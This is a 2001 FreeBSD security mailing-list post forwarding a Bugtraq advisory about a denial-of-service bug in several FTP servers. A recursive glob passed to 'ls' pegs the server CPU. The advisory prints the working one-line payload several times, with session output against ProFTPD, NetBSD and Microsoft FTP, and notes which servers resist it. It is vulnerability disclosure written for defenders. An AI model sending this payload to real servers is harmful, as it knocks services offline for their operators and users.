From owner-freebsd-security Thu Mar 15 12:21:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from k2.jozsef.kando.hu (k2.jozsef.kando.hu [193.224.40.3]) by hub.freebsd.org (Postfix) with SMTP id A5C5637B719 for ; Thu, 15 Mar 2001 12:21:18 -0800 (PST) (envelope-from bra@fsn.hu) Received: (qmail 10725 invoked by uid 1000); 15 Mar 2001 20:21:16 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 15 Mar 2001 20:21:16 -0000 Date: Thu, 15 Mar 2001 21:21:16 +0100 (CET) From: Attila Nagy X-X-Sender: To: Subject: Multiple vendors FTP denial of service (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org FreeBSD isn't listed, but also vulnerable, at least with the FTPd in -STABLE. ---------- Forwarded message ---------- Date: Thu, 15 Mar 2001 09:34:09 +0100 From: "Frank DENIS (Jedi/Sector One)" To: BUGTRAQ@SECURITYFOCUS.COM Subject: Multiple vendors FTP denial of service - Proftpd built-in 'ls' command has a globbing bug that allows remote denial-of-service. Here's a simple exploit, tested on the Proftpd site : $ ftp ftp.proftpd.org ... Name (ftp.proftpd.org:j): ftp ... 230 Anonymous access granted, restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 227 Entering Passive Mode (216,10,40,219,4,111). 421 Service not available, remote server timed out. Connection closed That command takes 100% CPU time on the server. It can lead into an easy DOS even if few remote simultanous connections are allowed. Other FTP servers may be concerned as well. Here are various tries : - NetBSD FTP showed the same behavior than Proftpd : ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 EPRT command successful. (long delay) 421 Service not available, remote server timed out. Connection closed So NetBSD-ftpd 20000723a may also consume 100% cpu time, resulting in a possible DOS. Other BSD FTP may be affected as well. - Microsoft FTP Service (Version 5.0) seems also confused by the command : ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 500 'EPSV': command not understood 227 Entering Passive Mode (207,46,133,140,4,223). 200 PORT command successful. 150 Opening ASCII mode data connection for file list. (very long delay... nothing happens...) - Publicfile refuses the command : ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 227 =131,193,178,181,97,222 550 Sorry, I can't open that file: file does not exist. - Wu-FTPd 2.6.1 is not vulnerable. Only the result of 'ls *' is computed and displayed. - PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard expression to *" and the 'ls *' output. Maintainers of vulnerable servers have been warned of this bug. -- -=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=- LINAGORA SA (Paris, France) : http://www.linagora.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message